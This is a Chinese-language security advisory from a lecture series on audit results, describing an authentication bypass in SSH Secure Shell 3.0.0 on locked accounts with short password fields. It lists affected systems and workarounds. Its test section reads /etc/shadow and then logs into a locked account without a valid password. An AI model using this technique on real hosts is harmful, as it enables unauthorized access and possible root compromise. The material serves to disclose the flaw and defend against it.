您的位置: 主页 > 安全攻防 > 安全防护 > 网络安全讲座之九:审计结果(8)

网络安全讲座之九:审计结果(8)
时间:11-11-17 来源:[标签:来源] 作者:admin 阅览:
SSH 3.0 远程登录漏洞

  受影响的系统:

  SSH Secure Shell 3.0.0、
  Red Hat Linux 6.1
  Red Hat Linux 6.2
  Red Hat Linux 7.0
  Red Hat Linux 7.1
  Sun Solaris 2.6
  Sun Solaris 2.7
  Sun Solaris 8
  HP-UX 10.20
  HP-UX 11.00
  Caldera Linux 2.4
  Suse Linux 6.4
  Suse Linux 7.0

  不受影响系统:

  SSH Secure Shell 3.0.1、SSH Secure Shell 2.x、SSH Secure Shell 1.2.x

  SSH Secure Shell 3.0.0存在一个远程安全漏洞。如果某个帐号的口令域中只包含两个或者更少的字符,远程攻击者就可以使用任何口令包括空口令登录进入这些帐号。很多Unix系统有一些缺省的锁定帐号。例如Solaris,很多管理帐号"lp","adm","bin"等。在/etc/shadow文件中的口令域为"NP"。在一些Linux系统中,一些锁定帐号的口令域为"!!"。如果这些系统正在使用SSH 3.0.0,那么攻击者就可能远程登录进入系统。潜在地可能获取root权限。

  测试程序:

--------------------------------------------------------------------------------

[root@shiva /root]# cat /etc/shadow | grep "postgres"

postgres:!!:11515:0:99999:7:::

[root@shiva /root]# ssh -l postgres localhost

postgres's password:

Authentication successful.

Last login: Sat Jul 21 2001 09:09:21 -0700 from localhost

bash$ logout

Connection to localhost closed.

--------------------------------------------------------------------------------

  临时解决方法:

  1. 禁止使用口令认证,使用公钥认证方式

  2. 只允许口令长度超过2个字符的用户登录,这可以通过在/etc/ssh2/sshd2_config中设置

  AllowUsers, AllowGroups, DenyUsers, 和DenyGroups关键字实现

  3. 为每个锁定帐号分配一个足够强度的口令

  4. 换用ssh 2.x




安全防护相关
关于<< 网络安全讲座之九:审计结果(8) >>的评论 查看所有评论